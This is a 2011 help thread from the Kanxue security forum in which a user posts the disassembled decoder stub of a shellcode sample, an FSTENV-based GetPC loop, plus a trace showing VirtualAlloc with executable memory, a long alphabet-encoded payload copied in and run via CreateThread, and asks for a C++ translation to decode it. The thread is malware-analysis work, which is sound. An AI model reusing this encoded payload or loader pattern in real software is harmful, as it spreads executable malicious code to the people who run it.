[求助]一个样本中的SHELLCODE解码分析-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[求助]一个样本中的SHELLCODE解码分析

发表于: 2011-6-20 19:29 4333

[求助]一个样本中的SHELLCODE解码分析

dayang

2011-6-20 19:29

4333

解码部分：

00401010 >|$  90          |NOP
00401011  |.  90          |NOP
00401012  |.  90          |NOP
00401013  |.  90          |NOP
00401014  |.  D9EE       |FLDZ
00401016  |.  D97424 F4    |FSTENV (28-BYTE) PTR SS:[ESP-C]
0040101A  |.  5E          |POP ESI
0040101B  |.  83C6 20    |ADD ESI,20
0040101E  |.  56          |PUSH ESI
0040101F  |.  5F          |POP EDI
00401020  |.  33C9       |XOR ECX,ECX
00401022  |.  66:3F       |AAS
00401024  |.  0266 AD    |ADD AH,BYTE PTR DS:[ESI-53]
00401027  |.  66:2D 6161 ||SUB AX,6161
0040102B  |.  C0E0 04    ||SHL AL,4
0040102E  |.  02C4       ||ADD AL,AH
00401030  |.  AA          ||STOS BYTE PTR ES:[EDI]
00401031  |.^ E2 F2       |\LOOPD SHORT Example.00401025

数据部分：

[CONFIG]
RR(`KERNEL32.DLL',`VirtualAlloc',`UUUU')
RR(`msvcrt.dll',`strncpy',`USU')
RR(`KERNEL32.DLL',`CreateThread',`UUUUUS')
VirtualAlloc(0x0DC20000, 0x1000, 0x3000, 0x40)
strncpy(0x0DC20000, "悙悙兕賢$鬪兤 V_3蒮?f璮-aa类莫怛gekbdaaaaaaaileaamilhabmknilhaaiojdeacaaaafiibomaaacaaaailpmijhhaiijehbapphhaigiomjhadamoimeabaaaaijehbmpphhaigipgccljhmoileabaaaaijehcapphhaigikfbhaahmoikeabaaaaijehcepphhaigipljhpnapoijeabaaaaijehcipphhaigibggfpkbaoiieabaaaaijehcmpphhaigibphjakoioiheabaaaaijehdapphhaigicflappmcoigeabaaaaijehdepphhaigikmainkhgoifeabaaaaijehdipphhaigijipoikaooieeabaaaaijehdmpphhaigiheijomjjoideabaaaaijeheapphhaigihoniochdoiceabaaaaijeheepphhaigiknjlhnnpoibeabaaaaijeheipphhbappfhdeddpgeginehgafafgppfheiidpipphepcdnaabaaaaahgolijehaeijhhgapphhaegkeappfhbmijehfmgkaagkaagkaapphhgappfhdiidpippheelgkaainfphafdpphhaepphhfmpphhgappfhcmilephaidojbailehfmeaibdififififihfajibhiaefjfjfjfjheaeocomolbkidmaaiijehbeeaibdifjfjfjfjhfajibhiaefifififiheaoocompphhfmppfhcaapifhcppppppidmaaiijehbigkaagiiaaaaaaagkacgkaagkaagiaaaaaaeapphhbappfhceijehgemhehgmenfkjaaagkaainfphafdgkaeinfpgmfdpphhgeppfhdailehbiclehbeidoiaiilfpbedaadedeiidpiaahfphgkaainfphafdilfpbiclfpbeidolaifdpphhbepphhgeppfhdapphhgeppfhcigkaapphhbappfhdmgkaappfheeffilomfhilhnaiilfnamfgilhddmilhebohiadpdfgilhgcaadpdddmjejebknadmdfgddpgaplobadkpcheaimbmoanadpceaolpbdlpofohfoffkilolilfkceadnnggilamelilfkbmadnnilaeiladmffofpfnmcaiaaoimhpnppppgddkfmgbcogfhigfaa烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫烫",1558 )
CreateThread(0,0,0x0DC20000,0,0,`nnnn')

解码部分的ASM的确看不懂，哪位好心的能人，能用C++翻译下？成功解密下面的代码

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

#调试逆向

收藏・0

免费・0

支持

最新回复 (1)
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 2 楼类似帖子: 【求助】在shellcode中遇到疑惑的浮点指令 2011-6-20 19:44 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

dayang

发帖

935

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (1)
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 2 楼类似帖子: 【求助】在shellcode中遇到疑惑的浮点指令 2011-6-20 19:44 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复